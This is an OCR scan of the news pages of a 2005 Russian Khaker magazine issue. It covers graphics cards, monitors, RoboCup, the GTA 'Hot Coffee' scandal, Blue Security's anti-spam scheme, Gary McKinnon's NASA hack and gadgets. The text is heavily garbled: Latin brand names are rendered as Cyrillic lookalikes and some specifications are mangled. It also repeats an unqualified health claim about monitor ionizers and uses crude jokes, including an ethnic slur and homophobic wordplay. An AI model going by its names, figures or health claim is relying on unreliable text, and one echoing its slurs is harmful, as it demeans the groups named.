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МЕГА-НЬЮС 




ІМТРО: 

Лето. Пока еще лето... Ты держишь в руках 80-й 
номер журнала Хакер. Юбилейный номер. Он 
особенный для нас. Так как журнал ежемесяч- 
ный, то получается, что он издается уже 
80/12=6.666 лет. Приятное такое число. 

Большой респект тебе, дорогой читатель, что ты 
с нами. Именно благодаря тебе мы издаемся 
уже столько лет. 
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Как видишь, мы постоянно что-то корректируем 
в журнале, меняем внешний облик, постоянно 
дорабатываем контент, стараясь делать качест- 
венный продукт. 

И мы будем всегда стремиться давать только са- 
мые вкусные и свежие материалы, чтобы ты был 
в курсе всего самого нового из мира ІТ. Не гру- 
зить, не учить жизни, а просто делиться с тобой 



информацией. Информация, которая, возможно, 
тебе понадобится в самые разные моменты жиз- 
ни. Начиная от примитивных способов защиты 
своего компьютера, заканчивая написанием 
сложных программных продуктов. 

Надеюсь, что и этот летний номер придется 
тебе по душе. 

Иван Петров, главный редактор 
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НАРОМЕѴѴЗ ▼ 



БОЛЬШЕ ИОНОВ 
ОТ МОНИТОРОВ! 




Два новых монитора от компании 8атзипд могут не только качественно 
показывать изображение, но они еще и заботятся о твоем здоровье. В 
них встроены ионизаторы воздуха. Если ты не знаешь, что это тебе даст, 
то вот справочка: они повышают уровень гамма-глобулина в крови, что 
увеличивает сопротивляемость организма болезнетворным бактериям, а 
также стимулируют выработку бета-эндорфина, положительно влияюще- 
го на настроение, устраняющего депрессии и стрессы и повышающего 
работоспособность. Ну как, впечатляет? Кстати, 720МА — это ЖК-па- 
нель, а 795МВЧ- — представитель вымирающего племени ЭЛТ-дисплеев. 
Первый имеет такие параметры: разрешение 1280x1024, время отклика 
8 мс, яркость 300 кд/м2, контрастность 600:1 и углы обзора 160°/160°. В 
модели 720НА отверстия ионизатора расположены в нижней части экра- 
на. Ты сможешь по своему желанию включить или выключить ионизатор 
простым нажатием кнопки. 



СІСАВУТЕ — ТЕПЕРЬ 
И КОРПУС! 

ОідаЬуІе выпускает свой первый корпус, который называется очень роман- 
тично — 30 Аигога. Он сделан из алюминия, не требует инструментов для 
сборки-разборки, вмещает массу накопителей, а сбоку передней панели 
расположены различные порты и аудиоразъемы. Любители оверклокинга 
оценят большой потенциал по вентиляции — помимо того, что большие 
размеры корпуса позволяют устанавливать в нем любую систему охлажде- 
ния (от стандартных радиаторов и вентиляторов до систем жидкостного ох- 
лаждения), на Аигог’е есть место для монтажа трех 120 мм вентиляторов 
(один устанавливается на переднюю 
панель, а два на заднюю). А чтобы 
пользователь чувствовал, что его 
комплектующие защищены от чу- 
жих посягательств, боковая и пе- 
редняя стенка корпуса оснащены 
замками. Кстати, сама компания 
ОідаЬуІе в качестве системы охлаж- 
дения авроры рекомендует свой 
продукт 30 Оаіаху, который подхо- 
дит сюда как по размеру, так и по 
дизайну. 




СТ от АТІ 

Компания пѴісІіа лиши- 
лась своей монополии 
на платы с префиксом 
ОТ. Вечные конкурен- 
ты из Канады анонси- 
ровали АТІ Васіеоп 
Х800ОТ, свою новую 
плату среднего уровня. 
Префикс в названии 
может стать причиной 
неслабой путаницы — 
ведь этот графический адаптер прямой противник 66000Т. В его основе ле- 
жит чип Н430РГО, выполненный по 0,11 мкм технологии, и имеющий 160 
млн. транзисторов. Но ОТ — это ОТ, средний уровень, поэтому в нем 8 пик- 
сельных конвейеров, хотя шина памяти такая же, как и в базовом чипе — 
256 бит. Частоты ядра/памяти равны 395МГц/700 МГц, соответственно, на 
плате будет 128 или 256 Мб ОООНЗ памяти. Или обычной ООН, как уж за- 
хочет производитель. Интерфейс, естественно, РСІ-Ехргезз х16, очень ве- 
роятна поддержка режима АТІ Сгоззііге. Цены на плату пока не названы, но, 
раз уж она направлена на противостояние с ОеРогсе 66000Т, то ее стои- 
мость должна быть около полутора сотен зеленых, иначе никакой конку- 
ренции не будет и в помине. Выход на рынок намечен в начале августа. 




ДВА В ОДНОМ 

Чтобы воспользоваться всеми преимуществами технологии пѴИІа ЗЕІ (огром- 
ные скоростные показатели) и не попасть с ее недостатками, по крайней ме- 
ре, не со всеми (большая цена, занимает много места в корпусе, высокий наг- 
рев, не со всеми играми работает), можно приобрести плату 0Ѵ-301-68ѲТ от 
компании ОідаЬуІе. Она располагает двумя графическими ядрами ОеРогсе 
6800 ОТ, работающими в связке по принципу ЗЕІ, имеет 2x16 пиксельных кон- 
вейеров и 512 Мб быстрой памяти ОООРЗ. Поддержка технологии ОиаЬ Ѵіеѵѵ 
обеспечивает работу с четырьмя мониторами. Просто панорама! По заявле- 
нию ОідаЬуІе, результатом всего этого являются 20000 баллов в ЗОМагк 2003 
и 10000 баллов в ЗОМагк 2005. В комплект поставки входит большой набор 
программ и игр, в том числе СуЬегІіпк РоѵѵегОѴО 6.0, Ооіпі ОрегаІІопз и ХрапЬ 
НаІІу. Мощная, но массивная система охлаждения полностью закрывает оба 
ГП и микросхемы памяти, состоит из вентилятора и радиаторов. 





Аренда виртуального 
ныделсинош сервера 



НІТЕСНМЕѴѴ8 
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с 13 по 17 июля в японском городе Осака проходил ПоЬоСир 2005 
{тт.юЬосир2005.огд). Ежегодный чемпионат мира по футболу среди ро- 
ботов приняли на этот раз 333 команды из 31 страны мира. Самым ярким 
зрелищем было признано спортивное сражение робособак АІЬо. В премь- 
ер-лиге двуногих роботов-гуманоидов победу одержала команда ѴізіОМ 
из Японии, обыгравшая со счетом 2:1 немецкую команду МітЬНо 
{ѵ/тѵ/.пітЬю.пеі). Победителям достался хрустальный хай-тек кубок. Рос- 
сийская команда ЗТЕР из Санкт-Петербургского института информатики 
и автоматизации РАН в очередной раз была заявлена в симуляционной 
лиге. Переход к трехмерной модели соревнований дался нашим с трудом. 
Команда не вышла из группы □ и закончила участие в турнире. В 20-ли- 
ге команда выступила лучше, однако не вошла в число призеров. В сле- 
дующем году НоЬоСир состоится в немецком городе Бремене. По замыс- 
лу создателей ВоЬоСир, в 2050 году должен пройти первый чемпионат 
мира между людьми и роботами-андроидами. 



ГОНКИ 

НА ВЕРБЛЮДАХ 

в Большой гонке на верблюдах в Сбъединенных Арабских Эмиратах впервые при- 
няли участие роботы-жокеи. Раньше в качестве погонщиков использовали детей в 

возрасте от 4 лет. Но с июля в этом тра- 
диционном соревновании бедуинов вве- 
ли ограничения. В день скачек 7 робо- 
тов весом от 15 до 26 килограммов пе- 
реодели в человеческую одежду и шле- 
мы. С помощью ремней их пристегнули 
к верблюжьим горбам. Действия робо- 
тов-жокеев с пульта дистанционного уп- 
равления контролировали операторы- 
арабы. По сигналу хозяев роботы натя- 
гивали поводья. А зрители подгоняли 
верблюдов свистом. В ближайшее вре- 
мя САЭ и соседний Катар закупят в 
Японии более 10 000 роботов-жокеев 
стоимостью от $2000 до $5500 каждый. 
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из СИМУЛЯТОРЫ АВ- 
ТО в СИМУЛЯТОРЫ 
ПОРНО 




Если ты думер, квакер и вообще потомственный геймер, думаю, тебе знакома 
игра ѲгапсІ ТІтеЯ АиЬ. В ней можно скомуниздить любой запорожец в большом 
курортном городе, и покататься на нем, выполняя разные миссии. Ну, ты в кур- 
се: убить того, зарезать другого, сжечь третьего. Так вот, агентство ЕЗНВ, сор- 
тирующее выходящие игры по категориям, присвоило новой части ОТА — Зал 
Апсігеаз — рейтинг М (разрешается играть детям от 17 лет). Пусть, мол, детишки 
постреляют. Но недавно стало известно такое, что ЕЗНВ пожалело о своей щед- 
рости не раз. В интернете какая-то добрая душа выложила программу Но( СоЯее, 
которая позволяет получить доступ к скрытому контенту игры. Например, в игре 
есть возможность отужинать у новой подружки в нумерах. Конечно, после каче- 
ственных свиданий, цветов и шепотов при луне. Что происходит в нумерах в ори- 
гинале не показывается — слышны только странные чпокающие звуки, кроват- 
ные скрипы и гортанные охи. Но программа проливает на странные явления свет. 
Мы попадаем внутрь подружкиного дома... и что же мы видим? Ууу, мы не толь- 
ко видим, мы даже можем управлять, помогая герою двигаться в такт. В общем, 
дети в восторге, зато их родители не очень. Вокруг Носкзіаг Епіегіаіптепі — ком- 
пании разработчика игры, разгорелся большой скандал. И на вопрос: «Это что за 
порнуха, позвольте?», геймдевелоперы мужественно произнесли: «Это не мы!». 
Нам подробно разъяснили, что программка та не раскрывает якобы скрытый кон- 
тент, а добавляет его. И все это козни хакеров в сторону примерных разработчи- 
ков игр. Но когда сотрудники игрового журнала Оатезроі отреверсили версию 
игры для консоли плейстейшн, они нашли в ней тот самый запретный контент, от 
которого так отнекивалась Носкзіаг. Сейчас трудно сказать, выиграла ли компа- 
ния от этого скандала или нет. С одной стороны, шум добавил игре известнос- 
ти, с другой — не всякий родитель теперь купит эту игру маленькому сыну. 



10-ЛЕТНЯЯ 
ВИНДОУЗ ГУРУ 

Чем ты занимался в 10 лет, мой 
юный друг? Ладно, не буду сму- 
щать, мы все этим занимались, а в 
первый раз я попробовал в 8. А вот 
10-летняя девочка из Пакистана с 
русским именем Арфа Карим Ранд- 
хава, в отличие от нас, в ванной не 
засиживалась. И в свои юные годы 
уже успела получить статус МСР 
(Сертифицированный ѴѴІпсІоѵѵз профессионал). Это вам не мышкой по яр- 
лыкам тыкать и порнушных теток на рабочий стол вешать. Девочке даже 
организовали аудиенцию с САМИМ Биллом Гейтсом. «Ну ты девочка ва- 
ще!» — восхитился Билл. «Дык я тавой, с 5 лет хакерю. И, кстати, Линукс 
маздая круче». «Но-но, девочка!» — обиделся Гейтс, но на работу взять по- 
обещал. «Ты только школу-то окончи». Сейчас маленькая гуру уже грызет 
тоннель в граните науки, осваивая секурити в государственном институте 
прикладных технологий. Знакомые пророчат ей большое будущее, а народ 
на форуме ЗесипІуІаЬ.ги выражает глубокое сочувствие. 




АВТОДРОМ 
НА БУМАГЕ 





Выпускники Королевского колледжа искусств — Филипп Уортингтон и Уиль- 
ям Деннис разработали прототип игрушечных гоночных автомобилей 
Еіпегісіегз {ттт.ііпегісіегз.пеі), которые двигаются по нарисованной трассе. Ма- 
шины выполнены в масштабе 1:43. Для нанесения дорожной разметки подхо- 
дит практически любая поверхность — от кухонного стола до пола в гостиной. 
Даже обычный лист бумаги может служить миниавтодромом. Благодаря мно- 
жеству сенсоров, игрушечный автомобиль всегда придерживается нарисо- 
ванной линии. Используя маркеры разных цветов и специальные значки, 
можно запрограммировать экстренное торможение, набор скорости перед 
прыжком или маневры по огибанию препятствий. Изобразить идеальную 
трассу не просто, но тем интереснее представляется задумка дизайнеров. 
Массовый выпуск автомобилей ипегісіегз планирует освоить компания Маііеі. 



ШПИОНСКИЕ ТРУСИКИ 

Безобидная ромашка на трусиках Рогдеі-Ме-Моі таит под собой страшную мощь 
военных технологий. Чип системы глобального позиционирования ѲРЗ о мини- 
атюрным элементом питания от часов вшивается в ткань таким образом, что на 
ощупь обнаружить его невозможно. Он позволяет незаметно в любой момент 
времени узнать местоположение хозяйки трусиков. А запатентованная система 
рапіуМар выдает ближайшие ориентиры. Эти данные в реальном времени пос- 
тупают на сотовый телефон, КПК или персональный компьютер — до 4 уст- 
ройств одновременно. Дополнительный биометрический сенсор докладывает о 
сердцебиении и температуре тела подопечной. Производством новинки зани- 
мается японская компания Рапсіііга. Стоимость гэджета составляет от $1 00 за 
самую базовую модель до $1 190 за недельный комплект продвинутой модели 
с сенсорами. Шпионские трусы для мужчин пока не заявлены. 
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ПЯТЫЙ ФЕСТИВАЛЬ 
КОМПЬЮТЕРНОГО 
ИСКУССТВА СНА08 
С0Н8ТВиСТ10Н8 
ОЕМО РАВТУ 2005 

20 — 21 августа 2005 года в Санкт-Петербурге пройдет пятый фести- 
валь компьютерного искусства СНАОЗ СОМЗТНиСТІОМЗ сіето рагіу 
2005. СНАОЗ СОНЗТНиСТЮМЗ бегло рагіу — единственный в России 
конкурс, где за право быть лучшим спорят как отечественные, так и за- 
рубежные программисты, художники, дизайнеры и музыканты. В этом 
году конкурсы пройдут по 24 номинациям, среди которых музыка, гра- 
фика, бегло и игры на РС, 2Х Зресігигп, МоЬІІе/НапббеІб, РІазІт. «На се- 
годня около 40 человек заявили порядка 60 работ», — говорит один из 
организаторов фестиваля Петр Соболев, — «однако надо понимать, 
что, например, участники конкурса в категории Зресігигп не отягощают 
себя предварительными заявками. Вообще, практика показывает, что 
число участников резко возрастает. Уже сейчас география фестиваля 
впечатляет: желание участвовать в конкурсной программе выразили 
не только жители Москвы и Санкт-Петербурга, но и Калининграда, 
Владивостока, Воркуты, Ижевска, Казани, Омска и многих других го- 
родов России. На СНАОЗ СОМЗТНиСТЮМЗ бето рагіу 2005 планиру- 
ется показ роликов образовательного характера, кратко рассказываю- 
щих о каждом конкурсе. В перерывах между конкурсами на сцене бу- 
дут выступать музыкальные группы Нееі Рго]ес1, СбірСиІІ, МсЕідИІегз. В 
рамках фестиваля пройдет уже ставшая традиционной уникальная 
выставка раритетных компьютеров о демонстрацией их в работе. Она, 
наверняка, заинтересует не только любителей старины, но и молодое 
поколение, пожалуй, только по книгам знакомы о такими «динозавра- 
ми», как ѴатаИа МЗХ-2, Зіпсіаіг 2Х Зресігит, ИСКРА-1030. Генераль- 
ным информационным спонсором фестиваля стали журналы Хакер и 
□ідііаі Сгеаііѵе Агіз. 





ПРОТЯНИ РУ«С/ 




Когда-то в древности Великий Учитель решил испытать 
своих учеников, предло>кив им выбрать для себя мечи. 

Один из них выбрал легкий меч, надеясь сохранить силы 
в долгом походе. Другой выбрал длинный меч, надеясь 
поразить им больше противников с безопасного расстояния. 
Но самым мудрым оказался третий ученик, который 
выбрал для себя самый удобный меч, ставший продолже- 
нием его руки. 

Удобство — вот разумный выбор! 

окІІСІ<780С 

* МиКІтебіа КеуЬоагб 



окііск 323 М 
Оріісаі Моизе 



\/ѵ\л/\л/. окііск. ГУ 

©товар сертифииирован 



ОКІІСК 
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НАВОМЕѴѴЗЖ 



ІЕмеѵѵз ▼ 



ДВУЛИЧНАЯ КЛАВА 




Порадовать геймеров решила канадская корпорация Меагоп. Давненько им 
ничего не перепадало, а теперь вот! Ісіеагоп предлагает устройства 2Ьоагс1 — 
клавиатуры, которые могут послужить и геймерам, и офисным работникам. 
Суть в том, что эти изделия имеют одну общую базу, на которую можно наце- 
пить либо обычный офисный, либо специальный игровой модуль. Первый 
представляет из себя простую клавиатуру, оснащенную дополнительными 
клавишами. Игровой модуль имеет основные (используемые для перемеще- 
ния) игровые клавиши увеличенной формы, а остальные (вроде прыжка, при- 
седания и так далее) расположены вокруг них, в пределах досягаемости паль- 
цев одной ладони. Профессиональные геймеры оценят возможность одновре- 
менного нажатия восьми клавиш, а также специальные модули с раскладка- 
ми для самых известных игр. Так что теперь у тебя будет не просто клавиату- 
ра для всех игр, а для каждого гамеса — своя! 



ЫѴІОІА ПРЕДСТАВИТ 
СЕРОВСЕ 7800 СТ 
УЖЕ СКОРО! 




Компания АТ! все никак не может начать поставки своего И520, а вот 
пѴісІіа, наоборот, продолжает набирать обороты. Не удовлетворившись од- 
ним лишь выпуском ОеРогсе 7800 ѲТХ, которую все только-только начали 
нюхать, тестить, разглядывать и ставить в 8РІ, как прошел слух, что всего- 
навсего через месяц выйдет ОеРогсе 7800 ОТ. Предполагается, что виде- 
оплаты ОеРогсе 7800 ОТ будут работать на частотах 335 и 1 100 МРц (ядро 
и память, соответсвенно), комплектоваться 256 Мб памяти типа ОООРІ-3 со 
временем выборки 1 ,6 или 2,0 нс. Рекомендованная цена составит сумму, 
равную четырем или пяти сотням американских долларов. В основе платы 
будет лежать все тот же чип 070, а вот дизайн печатной платы слегка из- 
менится. Это, не считая тех изменений, которые внесут непосредственно 
производители видеоплат. Так что ждем-с — кто пѴісІіа ОеРогсе 7800 ОТ, 
а кто — АТ! Ріасіеоп РІ520. 



ГОЛУБЫЕ БОРЯТСЯ 
СО СПАМОМ 




Какое, по-твоему, наказание заслуживают спамеры? Согласен, кастрация 
о множественной ампутацией им самое то, но компания ВІие ЗесцгІІу име- 
ет свой метод воздействия. РІазываетоя он ВІие Соттипііу, или по-русски 
— клуб голубых. Если ты изо дня в день выгребаешь из рабочего ящика 
горы рекламного трэша — клуб голубых именно то, что тебе нужно. Всту- 
пить в него можно, зарегившись на сайте, дальше тебе предлагается ска- 
чать клиент ВІие Ргод и обзавестись парочкой новых почтовых ящиков. 
Они будут работать по принципу Ітопеуроіз, являясь приманкой для спама. 
Когда гадкие спамеры позарятся на девственный ящик и начнут продви- 
гать в нем свои сайты с «самыми горячими сиськами», за дело берется 
ВІие ЗесигКу. Удостоверившись, что спамерский трэш нарушает амери- 
канский закон САМ-ЗРАМ, они натравливают на рекламируемый сайт 
свои боты, которые отыскивают поля для ввода текста и вставляют в них 
просьбу исключить такой-то почтовый ящик из «списка потенциальных 
клиентов». А так как вое мемберы по сути объединены, то просьб этих бу- 
дет в полях столько, что владельцам горячих сисек разгребать и разгре- 
бать. Это можно сравнить о ОоЗ-атакой, с той лишь разницей, что все как 
бы по-честному и не придраться. У подобного метода есть и противники, 
например, Джон Левайн — ведущий специалист по борьбе со спамом и 
член крупной антиспамерской коалиции. По его мнению, этот способ ни- 
куда не годится ввиду своей неэтичности. На что руководитель Голубой 
Секурити ответил: «Мы пытаемся предупредить спамеров, а не атаковать 
их. Они вполне могут убрать ящики из описка членов клуба Голубых. А ес- 
ли нет — на нет и суда нет. Гы-гы». Словом, инициатива хорошая. Я б и 
сам к ним присоединился, если б название клуба было другим. 



ВСЕ БЫ ВАМ 
ШУТОЧКИ ШУТИТЬ 

Как нам стало известно, из новос- 
ти на ЗесигПуІаЬ.т, датированной 
1 апреля этого года, корпорация 
МісгозоН заключила договор с 
НИИ Трансплантологии о сотруд- 
ничестве. Как говорится, вы — 
нам, мы — вам. Билли Гейтс обя- 
зался снабжать докторов новей- 
шими виндами и прочими маздай- 
ными прогами, а НИИ — делать халявные операции на пересадку органов 
хворающим сотрудникам компании. Народ на секулабе, помнится, тогда 
не повелся. «Все бы вам шуточки шутить», — скептически комментирова- 
ла публика. А вот кое-кто поверил. И не только поверил, но и сообразил: 
«А ведь клево получается. Надо бы им свой тетрис на бейсике впихнуть, а 
взамен пусть пришьют мне новые уши вместо моих лопоухих». Короче, 
предложения от вдохновленных софтмейкеров повалили в НИИ Тран- 
сплантологии не просто ручьем, а Ниагарским водопадом. Да еще и орга- 
ны соответствующие заинтересовались, ведь пересадки органов, простите 
уж за тафталогию, в России запрещены. Наконец, представители НИИ не 
выдержали и обратились к авторам портала с просьбой прекратить это бе- 
зобразие. Результатом стало официальное заявление в новостях секула- 
ба, мол, шутка была, чуваки. Шутим мы так, ага. А злосчастную статью 
удалили от греха подальше. 







Исследуйте мир вместе 





Новые возмо^кности для члееов Вашей семьи 
- помогите им расширить сферу интересов 
и развить мвыѳ умения и навыки. 
Ехсііоп ипіѵегваі ЕР 13 на проі^іасеора 
Ілъбів> РалНилі® 4 с теянолошей ИТ (>а^твёт с 
исжпючитвпьной производительностью, 
открывай новые возможности для обучения 
детей и помогая найти ванную информарию 
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НАВОМЕѴѴЗЖ 



НІТЕСНМЕѴѴЗ ▼ 



КАК ПОЛУЧИТЬ 
30 ГБ НА ОѴО? 



Своим секретом поделились инженеры компании ТозИІЬа, которая уже име- 
ет в своем активе двухслойные болванки НО ОѴО-Н ОО как раз такого объ- 
ема. Чтобы это стало возможным, потребовалось разработать новый орга- 
нический материал, используемый в качестве слоя отражения в дисках, а 
также реализовать новый, более совершенный техпроцесс. Для создания 
дисков НО ОѴО-Н 00 нужно было сильно снизить толщину отражающего 
слоя серебра, чтобы дать возможность лазерному лучу свободно достигать 
нижележащего слоя. Однако более тонкий слой серебра начинает активно 
«поглощать» энергию, то есть при уменьшении толщины слоя серебра вы- 
деление теплоты из слоя значительно снижается. Вследствие теплового 
расширения искажается взаимное расположение записанных меток. Для 
преодоления этого эффекта разработчики использовали органический ма- 
териал с большим коэффициентом теплопроводности. ТозбіЬа начинает ис- 
пользовать 0.6-мм фор- 
мовочные матрицы из 
поликарбоната, кото- 
рые могут использо- 
ваться в следующих 
стадиях техпроцесса. 



Т08НІВА 



ВСЕ ЦВЕТА РАДУГИ 




Компания Сгеаііѵе обновила экстерьер своих устройств. Теперь 
акустические системы серий ЗВ8 Ѵіѵіб 80, ЗВЗ Ѵіѵіб 60 и І-Тгідие 
3400 доступны в десяти различных цветовых исполнениях. Система 
ЗВЗ Ѵіѵіб 80 имеет два 1,25 дюймовых драйвера, один из которых 
создает детальный и чистый звук, а второй используется для повы- 
шения басов. Как ЗВЗ Ѵіѵіб 80, так и ЗВЗ Ѵіѵіб 60 имеет встроен- 
ные переключатели для наушников. Набор Сгеаііѵе І-Тгідие 3400 2.1 
состоит из двух сателлитов, оснащенных тремя 1 -дюймовыми мик- 
родрайверами Мео Тііапіит и сабвуфера, использующего 6,5-дюй- 
мовый драйвер. Есть возможность использовать эти колонки с 
МРЗ-плеерами, КПК и другими портативными устройствами. По 
словам одного из топ-менеджеров Сгеаііѵе: «Благодаря модному 
дизайну, эти мощные колонки дают пользователям тот стиль, кото- 
рый они сами пожелают». 



МИМО ЛУНКИ 




^ в магазин ІѴѴапЮпеОІТІтозе.сот 
завезли «умные» мячики для 
гольфа іпсгесІ-а-ВаІІ. Нет, это не 
тот фантастический гэджет, кото- 
Щ рый сам огибает деревья и дру- 
™ гие препятствия, выпрыгивает из 
расщелин и прямиком закатыва- 
ется в лунку. Внутри іпсгеб-а-Ваіі 
вращающийся гироскоп. По нажа- 
тию на единственную кнопку на 
трехдиапазонной дистанционке, 
мячик начинает двигаться зигза- 
гом, виляя из стороны в сторону. 
Разработчики предостерегают — если твой противник не понимает 
хорошую шутку, можно пропустить удар клюшкой под дых. В комплек- 
те с гэджетом поставляется зарядное устройство. Стоит іпогеб-а-Ваіі 
25 американских рублей. 



КРЕМ ДЛЯ ЗАГАРА 

Когда в термометре за окном закипела ртуть, некто Эд Филлипс из 
Великобритании выдал свое новое суперизобретение — интеллекту- 
альный дозатор для солнцезащитного крема. МуТап представляет 
собой компактную емкость, в которую заливается лосьон или крем 
для загара. Первым делом, вращая ручку, нужно задать тип кожи и 
ее склонность к загару. Эту характеристику можно определить по 
таблице на основе данных о цвете кожи до загара, цвете волос, ко- 
личестве веснушек и цвете кожи после загара. Затем следует ука- 
зать время суток и солнечную активность, а также длительность 
солнечных ванн. В соответствии с желаемым результатом, на ролик 
будет выдавлено ровно столько крема, чтобы получить здоровый за- 
гар, а не покрыться волдырями. С использованием МуТап отпадает 
необходимость носить с собой несколько средств для загара с раз- 
ными факторами защиты. Сам по себе дозатор очень удобен в ис- 
пользовании, а емкость можно заправлять неоднократно. 





ІСМЕѴѴЗ 



НМЕѴѴЗ 



УКРАИНСКИЕ ГЕЙМ- 
ДЕВЕЛОПЕРЫ ЖГУТ 

Хитом продаж на рынке компьютерных игр на 
Украине сейчас является игрушка «Операция 
Галичина». Она по сути является аддоном к 
шутеру ОИозІ Несоп, а в основе сюжета ле- 
жат политические события незалэжной дер- 
жавы, в которой нынче смутные времена. Ци- 
тирую текст на коробочке: «2008 год. На пре- 
зидентских выборах на Украине побеждает 
проросоийский кандидат Сергей Гришков. В западных областях не 
признают результаты выборов и объявляют, что не будут подчинять- 
ся продавшемуся русским Гришкову. Украина обращается к России с 
просьбой помочь в восстановлении территориальной целостности 
страны». В игре ты управляешь тем, кого прислали на помощь, то 
есть звероподобным спецназовцем о татуэровкой «Убиваю о одного 
удара». Твоя задача — штурмовать украинские города, мочить хох- 
лов и насиловать их женщин. С последним — это я приукрасил, но в 
целом миссия понятна. Украинские чиновники такого поворота не 
ожидали. Ведь игра, по сути — симулятор свержения власти на Укра- 
ине и убиения ее мирных жителей. Поэтому в срочном порядке изда- 
ли указ игру запретить, виновных найти и повесить. Ну, или хотя бы 
выговор строгий сделать. В составе скандальной игры есть и другие 
части с событиями, которые якобы развиваются в далеком будущем. 
Например, в 8002 году на президентских выборах на Уране побежда- 
ет голубой кандидат Сережа Голубков. На Луне розовые избиратели 
не признают результаты выборов и объявляют, что не будут подчи- 
няться пропившемуся голубому засилию. Уран обращается к Марсу с 
просьбой помочь в восстановлении территориальной целостности 
империи». Несмотря на запрет, игра бойко расходится с пиратских 
прилавков, и наши украинские друзья с удовольствием расстрелива- 
ют своих виртуальных соотечественников. Вообще, это не единствен- 
ная игра, сделанная на Украине с политическим уклоном. Народ кле- 
пает геймухи, где предлагается метать яйца в Януковича, и таким об- 
разом «спасти Украину». Весело там, судя по всему. 





ХАКЕР РАСКРЫВАЕТ 
СЕКРЕТЫ МА8А 

Хакера этого зовут Га- 
ри Маккиннон. Обыч- 
ный 39-летней амери- 
канский хакер, вроде 
бы ничего особенного. 
Но Г арик взломал сеть 
нескольких военных и 
правительственных се- 
тш тей США, включая 
МА8А. И, так как прави- 
тельство этого не лю- 
бит, парня арестова- 
ли — теперь ему гро- 
зит до 70 лет тюрьмы. А пока он ожидает суда, журналисты газеты ТИе 
Оиагсііап связались со взломщиков и, как бы невзначай, поинтересовались, 
что такого интересного он обнаружил в секретных закромах сверхдержавы. 
«Ооо, я обнаружил там ТАКОЕ», — многозначительно охнул Гари. «Список 
внеземных сотрудников! Представляете? Они то уж точно не на Земле. А еще 
список названий кораблей! И это уж наверняка не тех, которые плавают». 
«Вы думаете у МА8А есть секретные космические корабли?», — оживились 
журналисты. «То, что я нашел, заставило меня в это поверить», — уверенно 
молвил хакер. А еще он признался, что ему удалось добраться до америка- 
нского центра управления космическими полетами, где оказались свидетель- 
ства подготовки межпланетной миссии! «Какой миссии?», — ужаснулись аку- 
лы пера. «Не помню. Я когда хакал, курнул малехо...». Правительство предъ- 
явило Гари серьезные обвинения. Мол, он повредил им там все компьютеры, 
удалил самые важные файлы и, вообще, слишком много знает. Хакер сооб- 
щил, что никакие компьютеры не повреждал, в МА8А попал исключительно 
из желания узнать побольше про НЛО, а если что-то и удалил случайно, то 
сорри, о кем не бывает. Чем закончится эта история, я не знаю, но, сдается 
мне, после откровений с журналистами тело бедолаги скоро выловят в реках 
Амазонки, обглоданное пираньями. Или в одной из психушек Америки. 



АВТОРОВ НИГЕРИЙС- 
КИХ ПИСЕМ ПРИНЯЛИ 







Ты, мой друг, наверня- 
ка знаешь, что такое 
нигерийские письма, 
тем более мы о них пи- 
сали. На твой почто- 
вый ящик в один прек- 
расный день приходит 
меосага, в которой 
предлагается выгод- 
ная сделка по отмыва- 
нию денег. История 
может отличаться, но 
смысл такой — помоги 
баблишком сейчас, 
чтобы получить в сто 
раз больше потом. Ясен ясень, потом ты не увидишь ни денег, ни автора. 
Выходцы из Нигерии, живущие нынче в Испании, с помощью такого при- 
митивного способа поднимают сотни тысяч баксов — доверчивых лохов в 
мире хватает. Испанские власти уже давно озабочены жалобами по пово- 
ду этих афер, и вот, наконец, решили положить этому конец. Месяц назад 
испанская полиция совместно о ФБР провели крупную операцию под ко- 
довым названием «Нил». Ее целью стало задержание всех этих нигерийс- 
кий благодетелей. В результате рейда удалось повязать 295 человек, так 
или иначе причастных к нигерийским аферам. Полиция изъяла более 200 
тысяч евро, 2 тысячи мобильников и 327 компьютеров. Вообще, готови- 
лись к рейду уже давно, еще о 2003 г. Но накрыть банду решили только 
сейчас, после того, как стали известны имена и адреса всех ключевых 
фигур. Сейчас полиция выясняет, где хранятся остальные денежки. Так- 
же есть предположение, что о арестом этой мафии количество нигерийс- 
ких посланий в инете резко сократится. Что ж, будем надеяться. 
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Едпнственнып праздник МЛСТОЯЩЕП МАГИИ 
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НІТЕСНМЕѴѴЗ ▼ 



НІТЕСНМЕѴѴЗ ▼ 



^ ШАШЛЫК НА СОЛНЦЕ ПЛАВАТЕЛЬНЫЕ ОЧКИ 
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в Европе начались продажи экологически чистой жаровни на солнечных 
лучах. Г риль Зип Соок производится в Португалии и позволяет готовить 
еду, используя солнце в качестве единственного источника энергии. Не 
нужно собирать дрова для костра или жечь газ. Нет токсичных выбросов 
в атмосферу. Используя несколько зеркал из полированного алюминия, 
устройство концентрирует солнечные лучи на тефлоновой сковороде в 
центре конструкции. Если солнце достаточно высоко, сковорода нагрева- 
ется до температуры 150 градусов по Цельсию и выше. В поясе тропиков 
можно разогревать до 3 килограммов еды разом, в других лоясах — чуть 
поменьше. Существует возможность запрограммировать время жарки. 
По таймеру зеркала будут автоматически деактивированы. Дополнитель- 
ная насадка позволяет приготовить кофе для компании из 6 человек все- 
го за 10 минут. В набор входят программируемые часы на солнечных ба- 
тареях. Стоимость гриля Зип Соок составляет около 200 евро. 



ТАБЛЕТКА ИЗ ЯЩИКА 




в Америке заработали первые автоматы по выдаче таблеток и микстур. С 
виду ЗсгірЮепІег (ѵ/тѵѵ.азіегез.сот) не отличается от банкомата с деньга- 
ми или ящика, выплевывающего шоколадные батончики. Назначая курс 
лечения, врач регистрирует рецепт в автомате и выдает пациенту персо- 
нальный логин и пароль. Очередную порцию таблеток можно предвари- 
тельно заказать через интернет или по телефону, а затем оплатить и заб- 
рать их в ЗсгірЮепІег. Чтобы пациент не получил слабительное вместо 
таблеток от кашля, машина дважды сверяет штрих-код: когда лекарства 
закладываются в автомат и непосредственно перед их выдачей. Новые ав- 
томаты эффективно решают проблему очередей в аптеках, а также обслу- 
живают заказы полуночных пациентов. 




Студентка третьего курса из Великобритании Кейти Уильямс изобрела 
«умные» очки Іпѵіеѵѵ Ооддіез для профессиональных пловцов. На внут- 
ренней стороне линз — точно на зрительной оси — расположены счет- 
чики времени и дистанции. При входе в воду пловец нажимает на кноп- 
ку на дужке очков, тем самым активирует встроенный компас и сооб- 
щает ему начальное направление движения. Далее при каждом разво- 
роте компас регистрирует изменение координат и добавляет единицу 
на ЕСС-табло. Сегодня большинство пловцов следит за временем по 
наручному или настенному секундомеру. Это не просто неудобно, но и 
ненужная потеря усилий и энергии. Многие сбиваются со счета. Теперь 
спортсмены могут полностью сконцентрироваться на совершенствова- 
нии техники плавания. 



ЛИТР БОЛ 

